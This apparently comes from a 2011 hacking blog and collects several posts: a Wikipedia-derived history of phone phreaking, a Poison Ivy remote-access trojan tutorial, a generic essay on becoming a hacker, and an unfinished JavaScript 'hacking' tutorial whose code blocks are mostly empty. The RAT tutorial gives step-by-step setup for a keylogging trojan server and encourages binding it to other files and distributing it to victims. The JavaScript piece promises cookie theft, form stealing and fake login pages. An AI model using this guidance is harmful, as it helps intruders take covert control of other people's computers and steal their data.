Hack2Learn

Phreaking

2011-04-08T02:44:00.001-07:00

Phreaking is a slang term coined to describe the activity of a subculture of people who study, experiment with, or explore telecommunication systems, such as equipment and systems connected to public telephone networks. As telephone networks have become computerized, phreaking has become closely linked with computer hacking.^[1] This is sometimes called the H/P culture (with H standing for hacking and P standing for phreaking).
The term phreak is a portmanteau of the words phone and freak, and may also refer to the use of various audio frequencies to manipulate a phone system. Phreak, phreaker, or phone phreak are names used for and by individuals who participate in phreaking. A large percentage of the phone Phreaks were blind.^[2]^[3] Because identities were usually masked, an exact percentage cannot be calculated.

[hide]

[edit] History

[edit] Switch hook and tone dialer

Possibly one of the first phreaking methods was switch-hooking. It is considered softcore^{[citation needed]} because it has almost negligible toll fraud potential. Nevertheless it allows placing calls from a phone where the rotary dial or keypad has been disabled by a key lock or other means to prevent unuthorized calls from that phone. It is done by rapidly pressing and releasing the switch hook to open and close the subscriber circuit, simulating the pulses generated by the rotary dial. Even most current telephone exchanges support this method^{[citation needed]}, as they need to be backward compatible with old subscriber hardware.
By rapidly clicking the hook for a variable number of times at roughly 5 to 10 clicks per second, and then keeping intervals of roughly one second, the caller can dial numbers as if they were using the rotary dial. The pulse counter in the exchange counts the pulses or clicks and interprets them in two possible ways. Depending on continent and country, one click with a following interval can be either "one" or "zero" and subsequent clicks before the interval are additively counted. This renders ten consecutive clicks being either "zero" or "nine", respectively. Some exchanges allow using additional clicks for special controls, but numbers 0-9 now fall in one of these two standards. One special code, "flash", is a very short single click, possible but hard to simulate. Back in the day of rotary dial, very often technically identical phone sets were marketed in multiple areas of the world, only with plugs matched by country and the dials being bezeled with the local standard numbers.
Such key-locked telephones, if wired to a modern DTMF capable exchange, can also be exploited by a tone dialer that generates the DTMF tones used by modern keypad units. These signals are now very uniformly standardized worldwide, and along with rotary dialing, they are almost all that is left of in-band signaling. It is notable that the two methods can be combined: Even if the exchange does not support DTMF, the key lock can be circumvented by switch-hooking, and the tone dialer can be then used to operate automated DTMF controlled services that can't be used with rotary dial.

[edit] 2600 hertz

Main article: 2600 hertz

The precise origins of phone phreaking are unknown, although it is believed^[who?] that phreak-like experimentation began with widespread deployment of automatic switches on the telephone networks. In the United States, AT&T began introducing automatic switches for long distance and certain forms of trunking carriers in the mid-to-late 1950s. With the introduction of these switches, the general population began, for the first time, to interact with computing power on a large scale. Phreaking can be viewed as an extension of this, where individuals interested in computers and technology, yet unable to further that interest for a variety of reasons, turned to the only available option: the computer controlled telephone network.^{[original research?]}
AT&T's fully automatic switches use tone dialing, a form of in-band signaling, and include some tones which are for internal telephone company use. One internal use tone is a tone of 2600 Hz which causes a telephone switch to think the call was over, and could be exploited to provide free long-distance and international calls.^[4]
The tone was discovered in approximately 1957,^[4] by Joe Engressia, a blind seven-year old boy. Engressia was skilled with perfect pitch, and discovered that whistling the fourth E above middle C (a frequency of 2600 Hz) would stop a dialed phone recording. Unaware of what he had done, Engressia called the phone company and asked why the recordings had stopped. This was the beginning of his love of exploring the telephone system.^[4]
Other early phreaks, such as "Bill from New York", began to develop a rudimentary understanding of how phone networks worked. Bill discovered that a recorder he owned could also play the tone at 2600 Hz with the same effect. John Draper discovered through his friendship with Engressia that the free whistles given out in Cap'n Crunch cereal boxes also produced a 2600 Hz tone when blown (providing his nickname, "Captain Crunch"). This allowed control of phone systems that worked on single frequency (SF) controls. One could sound a long whistle to reset the line, followed by groups of whistles (a short tone for a "1", two for a "2", etc.) to dial numbers.

[edit] Multi frequency

Main article: Multi-frequency

While single frequency worked on certain phone routes, the most common signaling on the then long distance network was multi-frequency (MF) controls. The slang term for these tones and their use was "Marty Freeman." The specific frequencies required were unknown until 1964, when Bell Systems published the information in the Bell System Technical Journal in an article describing the methods and frequencies used for interoffice signalling. The journal was intended for the company's engineers; however, it found its way to various college campuses across the United States. With this one article, the Bell System accidentally gave away the "keys to the kingdom," and the intricacies of the phone system were at the disposal of anyone with a cursory knowledge of electronics.^{[citation needed]}
The second generation of phreaks arose at this time, including the New Yorkers "Evan Doorbell", "Ben Decibel" and Neil R. Bell and Californians Mark Bernay, Chris Bernay, and "Alan from Canada". Each conducted their own independent exploration and experimentation of the telephone network, initially on an individual basis, and later within groups as they discovered each other in their travels. "Evan Doorbell," "Ben" and "Neil" formed a group of phreaks known as Group Bell. Mark Bernay initiated a similar group named the Mark Bernay Society. Both Mark and Evan received fame amongst today's phone phreakers for Internet publication of their collection of telephone exploration recordings. These recordings, conducted in the 60s, 70s, and early 80s are available at Mark's website Phone Trips.^[5]

[edit] Blue boxes

Main article: Blue box

In October 1971, phreaking was introduced to the masses when Esquire Magazine published a story called "Secrets of the Little Blue Box"^[6] by Ron Rosenbaum. This article featured Engressia and John Draper prominently, synonymising their names with phreaking. The article also attracted the interest of other soon-to-be phreaks, such as Steve Wozniak and Steve Jobs, who went on to found Apple Computer.^[7]
1971 also saw the beginnings of YIPL (Youth International Party Line), a publication started by Abbie Hoffman and Al Bell to provide information to Yippies on how to "beat the man," mostly involving telephones. In 1973, Al Bell would move YIPL over and start TAP (Technological American Party^[8]). TAP would develop into a major source for subversive technical information among phreaks and hackers all over the world. TAP ran from 1973 to 1984, with Al Bell handing over the magazine to "Tom Edison" in the late 70's. TAP ended publication in 1984 due mostly to a break-in and arson at Tom Edison's residence in 1983.^[9] Cheshire Catalyst then took over running the magazine for its final (1984) year.
A controversially suppressed article "How to Build a 'Phone Phreaks' box" in Ramparts Magazine (June, 1972) touched off a firestorm of interest in phreaking. This article published simple schematic plans of a "black box" used to receive free long distance phone calls, and included a very short parts list that could be used to construct one. Bell sued Ramparts which forced the magazine to pull all copies from shelves, but not before numerous copies were sold and many regular subscribers received them.

[edit] Computer hacking

In the 1980s, the revolution of the personal computer and the popularity of computer bulletin board systems (accessed via modem) created an influx of tech-savvy users. These BBSes became popular for computer hackers and others interested in the technology, and served as a medium for previously scattered independent phone phreaks to share their discoveries and experiments. This not only led to unprecedented collaboration between phone phreaks, but also spread the notion of phreaking to others who took it upon themselves to study, experiment with, or exploit the telephone system. This was also at a time when the telephone company was a popular subject of discussion in the US, as the monopoly AT&T was forced into divestiture. During this time, phreaking lost its label for being the exploration of the telephone network, and began to focus more on toll fraud. Computer hackers began to use phreaking methods to find the telephone numbers for modems belonging to businesses, which they could later exploit. Groups then formed around the BBS hacker/phreaking (H/P) community such as the famous Masters of Deception (Phiber Optik) and Legion of Doom (Erik Bloodaxe) groups. In 1985 an underground e-zine called Phrack (a combination of the words Phreak and Hack) began circulation among BBSes, and focused on hacking, phreaking, and other related technological subjects.
In the early 1990s H/P groups like Masters of Deception and Legion of Doom were shut down by the US Secret Service's Operation Sundevil. Phreaking as a subculture saw a brief dispersion in fear of criminal prosecution in the 1990s, before the popularity of the internet initiated a reemergence of phreaking as a subculture in the US and spread phreaking to international levels.
Into the turn of the 21st century, phreaks began to focus on the exploration and playing with the network, and the concept of toll fraud became widely frowned on among serious phreakers, primarily under the influence of the website Phone Trips, put up by second generation phreaks Mark Bernay and Evan Doorbell.

[edit] Toll fraud

The 1984 AT&T breakup gave rise to many small companies intent upon competing in the long distance market. These included the then-fledgling Sprint and MCI, both of whom had only recently entered the marketplace. At the time, there was no way to switch a phone line to have calls automatically carried by non-AT&T companies. Customers of these small long distance operations would be required to dial a local access number, enter their calling card number, and finally enter the area code and phone number they wish to call. Because of the relatively lengthy process for customers to complete a call, the companies kept the calling card numbers short – usually 6 or 7 digits. This opened up a huge vulnerability to phone phreaks with a computer.
6-digit calling card numbers only offer 1 million combinations. 7-digit numbers offer just 10 million. If a company had 10,000 customers, a person attempting to "guess" a card number would have a good chance of doing so correctly once every 100 tries for a 6-digit card and once every 1000 tries for a 7-digit card. While this is almost easy enough for people to do manually, computers made the task far easier. "Code hack" programs were developed for computers with modems. The modems would dial the long distance access number, enter a random calling card number (of the proper number of digits), and attempt to complete a call to a computer bulletin board system (BBS). If the computer connected successfully to the BBS, it proved that it had found a working card number, and it saved that number to disk. If it did not connect to the BBS in a specified amount of time (usually 30 or 60 seconds), it would hang up and try a different code. Using this methodology, code hacking programs would turn up hundreds (or in some cases thousands) of working calling card numbers per day. These would subsequently be shared amongst fellow phreakers.
There was no way for these small phone companies to identify the culprits of these hacks. They had no access to local phone company records of calls into their access numbers, and even if they had access, obtaining such records would be prohibitively expensive and time-consuming. While there was some advancement in tracking down these code hackers in the early 1990s, the problem did not completely disappear until most long distance companies were able to offer standard 1+ dialing without the use of an access number.

[edit] Diverters

Another method of obtaining free phone calls involved the use of so-called "diverters". Call forwarding was not an available feature for many business phone lines in the 1980s and early 1990s, so they were forced to buy equipment that could do the job manually between two phone lines. When the business would close, they would program the call diverting equipment to answer all calls, pick up another phone line, call their answering service, and bridge the two lines together. This gave the appearance to the caller that they were directly forwarded to the company's answering service. The switching equipment would typically reset the line after the call had hung up and timed out back to dial tone, so the caller could simply wait after the answering service had disconnected, and would eventually get a usable dial tone from the second line. Phreakers recognized the opportunity this provided, and they would spend hours manually dialing businesses after hours, attempting to identify faulty diverters. Once a phreaker had access to one of these lines, he could use it for one of many purposes. In addition to completing phone calls anywhere in the world at the business' expense, they could also dial 1-900 phone sex/entertainment numbers, as well as use the phone line to harass their enemies without fear of being traced. Victimized small businesses were usually required to foot the bill for the long distance calls, as it was their own private equipment (not phone company security flaws) that allowed such fraud to occur. By 1993, call forwarding was offered to nearly every business line subscriber, making these diverters obsolete. As a result, hackers stopped searching for the few remaining ones, and this method of toll fraud died.

[edit] Voice mail boxes and bridges

Prior to the BBS era of the 1980s phone phreaking was more of a solitary venture as it was difficult for phreaks to connect with one another. In addition to communicating over BBSs phone phreaks discovered voice mail boxes and party lines as ways to network and keep in touch over the telephone. It was rare for a phone phreak to legally purchase access to voice mail. Instead, they usually would appropriate unused boxes that were part of business or cellular phone systems. Once a vulnerable mailbox system was discovered, word would spread around the phreak community, and scores of them would take residence on the system. They would use the system as a "home base" for communication with one another until the rightful owners would discover the intrusion and wipe them off. Voice mailboxes also provided a safe phone number for phreaks to give out to one another as home phone numbers would allow the phreak's identity (and home address) to be discovered. This was especially important given that phone phreaks were breaking the law.
Phreakers also used "bridges" to communicate live with one another. The term "bridge" originally referred to a group of telephone company test lines that were bridged together giving the effect of a party-line. Eventually, all party-lines, whether bridges or not, came to be known as bridges if primarily populated by hackers and/or phreakers.
The popularity of the Internet in the mid-1990s, along with the better awareness of voice mail by business and cell phone owners, made the practice of stealing voice mailboxes less popular. To this day bridges are still very popular with phreakers yet, with the advent of VoIP, the use of telephone company owned bridges has decreased slightly in favor of phreaker-owned conferences.

[edit] Cell phones

By the late 1990s, the fraudulent aspect of phreaking all but vanished. Most cellular phones offered unlimited domestic long distance calling for the price of standard airtime (often totally unlimited on weekends), and flat-rate long-distance plans appeared offering unlimited home phone long distance for as little as $25 per month. International calling could be made very cheaply, as well. Between the much higher risk of being caught (due to advances in technology) and the much lower gain of making free phone calls, toll fraud started to become a concept associated very little with phreaking.

[edit] End of multi-frequency

The end of multi-frequency (MF) phreaking in the lower 48 United States occurred on June 15, 2006, when the last exchange in the continental United States to use a "phreakable" MF-signalled trunk replaced the aging (yet still well kept) N2 carrier with a T1 carrier. This exchange, located in Wawina Township, Minnesota, was run by the Northern Telephone Company of Minnesota. Many phone phreaks from across North America and the world made calls into what was the last group of MF-able inward trunks in the continental United States. A message board was set up for Paul Revere on +1 (218) 488-1307, for phone phreaks across the world to "say their goodbyes" to MF signalling and the N2 in Wawina.
During the days prior to the cutover, many famous phone phreaks such as Mark Bernay, Joybubbles, Bob Bernay, and Captain Crunch could be heard leaving their comments on the message board. The official date for the cutover from N2 to T-carrier was Wednesday, June 14. As early as June 7, there was a noticeable static on what had previously been clear lines. By Monday, June 12, many numbers were unreachable, and the static had peaked. The recording on +1 (218) 488-1307 was generally inaccessible, and MFing through the switch was becoming increasingly difficult due to the increased static. On June 15, at around 1:40 am, Eastern Daylight Time, any new incoming calls were unreachable}. As of July 20, 2010, the message played at +1 (218) 488-1307 was simply the current time for Wawina, Minnesota.^[10]

[edit] 2600 Hz

It has been suggested that this article or section be merged into 2600 hertz. (Discuss)

In the original analog networks, short-distance telephone calls were completed by sending relatively high-power electrical signals through the wires to the end office, which then switched the call. This technique could not be used for long-distance connections, because the signals would be filtered out due to capacitance in the wires. Long-distance switching remained a manual operation years after short-distance calls were automated, requiring operators at either end of the line to set up the connections.
Bell automated this process by sending "in-band" signals. Since the one thing the long-distance trunks were definitely able to do was send voice-frequency signals, the Bell system used a selection of tones sent over the trunks to control the system. When calling long-distance, the local end-office switch would first route the call to a special switch (this is why it is necessary to dial "1" in North America or "0" in most of Europe for long-distance calls) which would then convert further dialing into tones and send them over an appropriately selected trunk line (selected with the area code). A similar machine at the far end of the trunk would decode the tones back into electrical signals, and the call would complete as normal.
In addition to dialing instructions, the system also included a number of other tones that represented various commands or status. 2600 Hz, the key to early phreaking, was the frequency of the tone sent by the long-distance switch indicating that the user has gone on-hook (hung up the phone). This normally resulted in the remote switch also going on-hook, freeing the trunk for other uses. In order to make free lines easy to find, the 2600 Hz tone was continually played into free trunks. Engressia's whistling had triggered the remote switch to go on-hook, but critically, the local switch knew he was still off-hook because that was signaled electrically. The system was now in an inconsistent state, leaving him connected to an operational long-distance trunk line. With further experimentation, the phreaks learned the rest of the signals needed to dial on the remote switch.
Normally long-distance calls are billed locally. Since the "trick" required a long distance call to be placed in order to connect to the remote switch, it would be billed like normal. However there are a class of calls that have either no billing, like calls to directory service, or reverse the billing, like WATS lines (1-800 numbers). By dialing one of these numbers the user was connected to a remote switch as normal, but no billing record was made locally. A number of people in the 1960s discovered a loophole that resulted from this combination of features that allowed free long distance calls to be made. First you would dial a toll-free number in the area code you wanted to connect to, then play the 2600 Hz tone into the line to return the remote switch to on-hook, and then use a blue box to dial the number you wanted to connect to. The local Bell office would have no record of the call.
As knowledge of phreaking spread, a minor culture emerged from the increasing number of phone phreaks. Sympathetic (or easily social-engineered) telephone company employees began to provide the various routing codes to use international satellites and trunk lines. At the time it was felt that there was nothing Bell could do to stop this. Their entire network was based on this system, so changing the system in order to stop the phreakers would require a massive infrastructure upgrade.
In fact, Bell responded fairly quickly, but in a more targeted fashion. Looking on local records for inordinately long calls to directory service or other hints that phreakers were using a particular switch, filters could then be installed to block efforts at that end office. Many phreakers were forced to use pay telephones as the telephone company technicians regularly tracked long-distance toll free calls in an elaborate cat-and-mouse game. AT&T instead turned to the law for help, and a number of phreaks were caught by the government.
Eventually, the phone companies in North America did, in fact, replace all their hardware. They didn't do it to stop the phreaks, but simply as a matter of course while moving to fully digital switching systems. Unlike the crossbar, where the switching signals and voice were carried on the same lines, the new systems used separate lines for signalling that the phreaks couldn't get to. This system is known as Common Channel Interoffice Signaling. Classic phreaking with the 2600 Hz tone continued to work in more remote locations into the 1980s, but was of little use in North America by the 1990s.

[edit] Famous phone phreaks

John Draper (Captain Crunch)
Mark Abene (Phiber Optik)
Denny Teresi
Joybubbles (Joe Engressia, The Whistler)
Patrick Kroupa (Lord Digital)
Kevin Mitnick (Condor)
Kevin Poulsen (Dark Dante)

Steve Wozniak (Berkeley Blue)
Jered Morgan (Lucky225)^[11]
C. Douglas Brickner (doug)^[12]
William Quinn (decoder) ^[13]
Kane Ryan Marlow (TRON) (Not to be confused with Boris Floricic^[14])
Brad Carter (RBCP)
Matt Blaze (M.F. Tones)
[Never Identified] (Phrackula, founder/leader of Illuminati Hack/Phreak group, active 1966-1992)

RAT Tutorial - Poison Ivy

2011-04-08T02:33:00.001-07:00

Note: I am not responsible for anything you do, ever. You are. I am posting this because I am very interested in RATs and coding my own. You alone are solely responsible of your actions, intentions, and accept so by reading the following. Intended for education purposes relating to any and all of the content below. It must be stressed that the poster is in no way to be held responsible for anything resulting from the addition of the below to your knowledge, or anything resulting from such an addition.

Note: This tutorial was writen by me and you are free to repost this as you please as long as you give full credit to me. You are in no way entitled to steal/copy my work without giving credit to me. but now i dont really care

Requirements:
---------------------------------
no-ip.biz account (see below for instructions)
RAT of your choice, I will be showing Poison Ivy
No-IP client
Know how to port forward (people behind routers only)
---------------------------------

Intro to RATs
---------------------------------
So here we go. I'm going to show you how to setup a RAT. A RAT can stand for a few things:
Remote Administration Tool
Remote Access Tool
Remote Access Trojan
Remote Administration Trojan
and probably more.
In any event, it doesn't matter. What you need to know is that it allows you to access the target computer from yours, using the trojan. Now it may help you to look this up on

Code:
wikipedia. http://en.wikipedia.org/wiki/Remote_administration_tool

---------------------------------

No IP
---------------------------------
First of all, go here

Code:
http://www.no-ip.com/newUser.php

and sign up for an account there. After that log into the site with the account you just created and add your new domain. SEE PIC no-ip.png
[attachment=2095]

Now download the dynamic update client from the downloads tab at the top of the no-ip site. Install that when you are done, and you can update your IP for your domain by logging into the client and updating. Pretty easy.
---------------------------------

Port Forwarding
---------------------------------
If you are not behind a router, skip this. If you are, read on.

You should know how to forward ports on your router. If you dont, head to google, and find out. Each router is different. Usually you can type 192.168.1.1 (or your router's IP address for your LAN) in the address bar of your browser. If you got the right LAN IP, a login box will appear, log in. Default is usually admin:password, or something similar. You're on your own here.
When you finally get int, forward port 3460. That's all.
Hulk11 pointed out that admin:admin is commonly used in routers as well.
---------------------------------

Getting the RAT
---------------------------------
Head over to

Code:
http://www.poisonivy-rat.com/index.php?link=download

and download the latest version. At the time of posting it was 2.3.2.
Download that and unzip it.
---------------------------------

Using the RAT
---------------------------------
Open up poison ivy, and click File>New Client. We are going to set up Poison Ivy to listen for connections on the port you forwarded. Default is 3460. Type in a password for your RAT and click start. You will need this password later.

Now File>New Server. Click create profile. Make it look like Server1.png Be sure that the password you put here and the password here match.
[attachment=2092]

Click next and make your server look like Server2.png.

[attachment=2093]
You will need to select Active X and click the random button. Having the server melt is up to you, I wouldn't pick melt when it is bound to another file. When the file is sent by itself, usually choose to melt it. Click next

Make your server look like Server3.png. Ignore the thing about the keylogger making it unstable. Not much else here. Click next.
[attachment=2094]

You can choose an icon here, or use a resource editor like ResHacker to chage it later. After you do that, click Generate at the bottom and save the .EXE somewhere.
---------------------------------

Testing the RAT
---------------------------------
You can run the server on yourself to test it, this is relatively safe because you have the password to connect to it. When you run the server, you should see yourself in the Poison Ivy Connection's tab.
Notice the pop up box from the system try alerting you of a new connection. That's nice. You can see this in Working.png
[attachment=2096]
I have edited out the IP addresses of those not on my LAN as well as their computer user names and such in order to protect them. To connect to a server, double click the entry in the connections tab. Behold! You are in their PC!
---------------------------------

Distributing
---------------------------------
You can distribute the server file by itself, or bind it to other files. This is where you get to do as you please. Get creative!
---------------------------------

Well that is about it. You can use this knowledge with other RATs and such. If this helped you, rep me or whatever. Don't steal my work, and have fun! Keep in mind both "Note:"s at the beginning of this post. Thanks!

Hacking Simplified - For Those Who Want to Learn Things From the Scratch

2011-04-08T02:31:00.001-07:00

Hacking Simplified - For Those Who Want to Learn Things From the Scratch

It's quite probable that you have received spam offering a hotmail hacking guide that will give you the basics on how to become a hacker. Although it sounds tempting to have the power to know the private life of other persons, most of these guides and courses are nothing but scams that are looking for new victims.

If you really want to become a hacker, you need to go to the places were they gather: a hacking facebook, a hacker's forum, free hacking tutorials or even a mailing list. The information is out there. You only need to go and find it.

Where Can You Get Material on Hacking and Information on Hacking

There are two main sources. The first one is the Internet. You will have to make a basic query in your favorite search engine with the word hacker and start looking each one of the suggested sites. Most of them will only offer you limited tutorials on how to hack (like the Hacker's Black book or the Happy Hacker book, which are outdated). Other's will give you an useful insight on this world. After some time, you will find forums were people from around the world share their experiences.

Do not expect to enter an easy world. The jargon used by a group of hackers can be quite confusing for any beginner. So don't feel that you will never be part of it. Start with the basics and read "How to become a hacker" from Eric S. Rymond. Although the document is five years old, it will give you an introductory crash course on were do you need to start.

The second source is face to face reunions. Get into the internet and search for any hacker's meeting in your vicinity. You will be surprised to find that they meet quite regularly. Of course, do not expect to find a Matrix kind of reunion. This is serious, professional people that pay their rent by hacking. Drop by and make some questions on hacking tutorials.

What Is The Hackers Bible?

The hacker's bible has two possible sources, depending on whom do you ask. For some people, it is none other but the magazine 2600: The Hacker Quarterly. This magazine was created by Emmanuel Goldstein, and it focuses on aspects of different technologies. For example, it covers telecommunication devices as well as computers.

The magazine gives to its readers grey hacker's material. That means that it gives them information on how to augment the capacities of any electronic apparatus, such as a cell phone. This neutral posture is different to white hacking (were a hacker uses his abilities for a good cause, like detecting the vulnerabilities of a network) and black hacking (were a hacker uses his knowledge for selfish purposes, like creating a hotmail hacking guide).

The other Hacker's Bible is the Jargon File. This document is a glossary of hacker slang that has been collected since 1975, from the old days of the Arpanet (the precursor of the Internet).

Hacking With Javascript

2011-04-08T00:09:00.001-07:00

Things to come: example of stealing info from users (anti-virus programs and trojans), story of ciru cookie stealing from acanium, ThePull's javascript exploits, and the about:// exploit. Since so many people were asking when this tutorial would come out I decided to finally put it up. I'd appriecated some feedback. Flames without a reason are not welcome. This tutorial is not completely finished.. and probably never will be :( -idea: cross site scriptting by opening a new page in a frame and then writting to form fields or somehow injecting javascript. Or somehow write the html to the top or bottom.

Intro

Javascript is used as a client side scripting language, meaning that your browser is what interprets it. It is used on webpages and is secure (for the most part) since it cannot touch any files on your hard drive (besides cookies). It also cannot read/write any files on the server. Knowing javascript can help you in both creating dynamic webpages, meaning webpages that change, and hacking. First I will start with the basic javascript syntax, then I will list a few sites where you can learn more, and then I will list a few ways you can use javascript to hack.
There are a few benifits of knowing javascript. For starters, it is really the only (fully supported) language that you can use on a website making it a very popular language on the net. It is very easy to learn and shares common syntax with many other languages. And it is completely open source, if you find something you like done in javascript you can simply view the source of the page and figure out how it's done. The reason I first got into javascript was because back before I got into hacking I wanted to make my own webpage. I learned HTML very quickly and saw Dynamic HTML (DHTML) mentioned in a few tutorials. I then ventured into the land of javascript making simple scripts and usful features to my site.
It was only after I was pretty good with javascript and got into hacking that I slowly saw it's potential to be used milisously. Many javascript techniques are pretty simple and involve tricking the user into doing something. Almost pure social engineering with a bit of help from javascript. After using simple javascript tricks to fake login pages for webbased email I thought about other ways javascript could be used to aid my hacking, I studied it on and off for around a year. Some of these techniques are used by millions of people, some I came up with an are purely theorectical. I hope you will realize how much javascript can aid a hacker.
1. Basic Syntax
2. Places To Learn More Advanced Javascript
3. Banner Busting & Killing Frames
4. Getting Past Scripts That Filter Javascript
5. Stealing Cookies
6. Stealing Forms
7. Gaining Info On Users
8. Stories Of Javascript Hacks
9. Conclusion

The basics of javascript are fairly easy if you have programmed anything before, although javascript is not java, if you know java you should have no problems learning it. Same for any other programming language, as most share the same basics as javascript uses. This tutorial might not be for the complete newbie. I would like to be able to do a tutorial like that, but I don't have the time or patience to write one. To begin if you don't know html you must learn it first!
Javascript starts with the tag <script language="javascript"> and ends with </script> Anything between these two tags is interpreted as javascript by the browser. Remember this! Cause a few hacks use the fact that if you use <script type="javascript"> and don't finish it all the html on the page underneath that is ignored. You can also use <script type="text/javascript"> and <</script>.. either way is fine. I would also like to mention that many scripts have  right before the </script> tag, this is because they would like to make it compatible with other browsers that do not support javascript. Again, either way is fine, but I will be using the  because that is how I learned to script and I got used to putting it in.
Javascript uses the same basic elements as other programming languages.. Such as variables, flow control, and functions. The only difference is that javascript is a lot more simplified, so anyone with some programming experience can learn javascript very quickly. The hardest part of scripting javascript is to get it to work in all browsers. I will now go over the basics of variables:
to define a variable as a number you do: var name = 1;
to define a variable as a string you do: var name = 'value';
A variable is basically the same in all programming languages. I might also point out that javascript does not support pointers. No structs to make your own variables either. Only variable types are defined by 'var'. This can be a hard thing to understand at first, but javascript is much like C++ in how it handles variables and strings. A string is a group of characters, like: 'word', which is a string. When you see something like document.write(something); it will try to print whatever is in the variable something. If you do document.write('something'); or document.write("something"); it will print the string 'something'. Now that you got the variables down lets see how to use arithmetic operators. This will make 2 variables and add them together to make a new word:
<script type="text/javascript">

</script>
first we define the variable 'name' as b0iler, then I define 'adjective' as owns. Then the document.write() function writes it to the page as 'name'+'adjective' or b0ilerowns. If we wanted a space we could have did document.write(name+' '+adjective);
Escaping characters - This is an important concept in programming, and extremely important in secure programming for other languages.. javascript doesn't really need to worry about secure programming practice since there is nothing that can be gained on the server from exploitting javascript. So what is "escaping"? It is putting a \ in front of certain characters, such as ' and ". If we wanted to print out:
b0iler's website
We couldn't do:
document.write('b0iler's website');
because the browser would read b0iler and see the ' then stop the string. We need to add a \ before the ' so that the browser knows to print ' and not interpret it as the ending ' of the string. So here is how we could print it:
document.write('b0iler\'s website');
There are two types of comments in javascript. // which only lasts till the end of the line, and /* which goes as many as far as possible until it reaches */ I'll demonstrate:
<script type="text/javascript">

</script>
The only thing that script will do is print "this will show up". Everything else is in comments which are not rendered as javascript by the browser.
Flow Control is basically changing what the program does depending on whether something is true or not. Again, if you have had any previous programming experience this is old stuff. You can do this a few different ways different ways. The simplest is the if-then-else statements. Here is an example:
<script type="text/javascript">

</script>
Lets break this down step by step. First I create the variable 'name' and define it as b0iler. Then I check if 'name' is equal to "b0iler" if it is then I write 'b0iler is a really cool guy!', else (if name isn't equal to b0iler) it prints 'b0iler can not define variables worth a hoot!'. You will notice that I put { and } around the actions after the if and else statements. You do this so that javascript knows how much to do when it is true. When I say true think of it this way:
if (name == 'b0iler')
as
if the variable name is equal to 'b0iler'
if the statement name == 'b0iler' is false (name does not equal 'b0iler') then whatever is in the {} (curely brackets) is skipped.
We now run into relational and equality operators. The relational operators are as follows:
> - Greater than, if the left is greater than the right the statement is true.
< - Less than, if the left is lesser than the right the statement is true.
>= - Greater than or equal to. If the left is greater than or equal to the right it is true.
<= - Less than or equal to. If the left is lesser than or equal to the right it is true.
So lets run through a quick example of this, in this example the variable 'lower' is set to 1 and the variable 'higher' is set to 10. If lower is less than higher then we add 10 to lower, otherwise we messed up assigning the variables (or with the if statement).
<script type="text/javascript">

</script>
and now the equality operators, you have already seen one of them in an example: if (name == 'b0iler') the equality operators are == for "equal to" and != for "not equal to". Make sure you always put two equal signs (==) because if you put only one (=) then it will not check for equality. This is a common mistake that is often overlooked.
Now we will get into loops, loops continue the statements in between the curly brackets {} until they are no longer true. There are 2 main types of loops I will cover: while and for loops. Here is an example of a while loop:
<script type="text/javascript">

</script>
First 'name' is set to b0iler, then 'namenumber' is set to 1. Here is where we hit the loop, it is a while loop. What happens is while namenumber is less than 5 it does the following 3 commands inside the brackets {}: name = name + name;   document.write(name);   namenumber = namenumber + 1;   The first statement doubles the length of 'name' by adding itself on to itself. The second statement prints 'name'. And the third statement increases 'namenumber' by 1. So since 'namenumber' goes up 1 each time through the loop, the loop will go through 4 times. After the 4th time 'namenumber' will be 5, so the statement namenumber < 5 will no longer be true.
Let me quickly go over some short cuts to standard math operators, these shortcuts are:
variable++;   // adds 1 to variable.
variable--;   // subtracts 1 from variable.
variable+= something;   // adds something to variable. Make sure to use 's if it is a string like:
variable+= 'string';
variable-= 3;   // subtracts 3 from variable
variable*= 2;   // multiples variable by 2.
Next loop is the for loop. This loop is unique in that it (defines a variable; then checks if a condition is true; and finally changes a variable after each time through the loop). For the example lets say you want to do the same thing as above. This is how you would do it with a for loop:
<script type="text/javascript">

</script>
First the variable name is defined, then it starts the for loop. It assigns 1 to namenumber, then checks if namenumber is less than 5 every time through the loop, and it increases namenumber by 1 every time through the loop (variablename++ means increase the variable by 1). The next 2 lines are the same as with the while loop. But since the for loop handles the declaration of namenumber and the increase every time through the loop it makes it simpler for the scripter and easier to keep track of for people trying to read the code. You can use a while loop if you want, it is all up to the scripter's preference.
Lets go over that for loop one more time, just for clarity. for (done only the first time; loop continues while this is true; done after every time through the loop)
That's it for learning javascript, this was really basic and pretty much covered things that are constant in most languages. For javascript specific guides check out the next section of the tutorial. This section was only to give the user enough info to understand the rest of the tutorial. I wish I could go over more, but there are way better tutorials for advanced javascript then one I could ever write.

I will just provide a list of tutorials and sites with more advanced javascript. If you wish to learn javascript and be able to write your own you will have to look at other people's scripts for examples and read a few more tutorials. I just went over the very basics so you wouldn't be lost.
http://hotwired.lycos.com/webmonkey/programming/javascript/tutorials/tutorial2.html - good examples, not really advanced.. prolly a medium level javascript tutorial.
http://www.webdevelopersjournal.com/articles/jsevents2/jsevents2.html - A javascript tutorial on event handles. Fairly advanced.
http://www.htmlguru.com - a classic site, go to the tutorials section and learn a lot of advanced javascript made easy.
http://server1.wsabstract.com/javatutors - Goes over some specific aspects to advanced javascript work. Useful in many situations.
http://www.pageresource.com/jscript/index6.htm - The advanced string handling and the forms tutorials are good, I would suggest reading them if you wish to get more into javascripting.
Coolnerd's Javascript Resource - A nice list of al the javascript operators, statements, objects.. although it might be alittle old I still use it all the time.
If you want to create your own javascripts for yoursite be warned. Javascripts are very limited in power, but can be the solution to many simple problems. You will have to spend a few weeks learning more advanced javascript in order to make anything really useful. Creating that awsome DHTML (Dynamic HTML) feels really good ;) Dynamic HTML is pretty much javascript that interacts with the user, css, and layers - <div>, <span>, and <layer>.
Here is some links to good dynamic html sites:
The Dynamic Duo, Cross browser dynamic html tutorial - Goes over things step by step.
Taylor's dynamic HTML tutorial - That nice webmonkey style that everyone loves.
Curious Eye DHTML tutorial - This will really get you going making cross browser Dynamic HTML.
Intro to DHTML - Might be nice if you aren't as html and javascript knowledgable as most DHTML beginners.
Good luck with your adventure into javascript =)

I call it banner busting, it is when you use javascript (or other tags) that aren't rendered by the browser the same as normal html tags to get around a popup or banner that free sites automatically put on your page. The basic idea of this is to have a tag that isn't rendered as html right before the html the site adds on their banner so that user's browsers do not see the banner. There is only really one key thing you need to find out in order to kill that banner. This is what tag the site uses as a "key". What I mean by this is what tag does the banner they add come before or after? Try putting up a page with just:
<html>

<body>

text

</body>

</html>
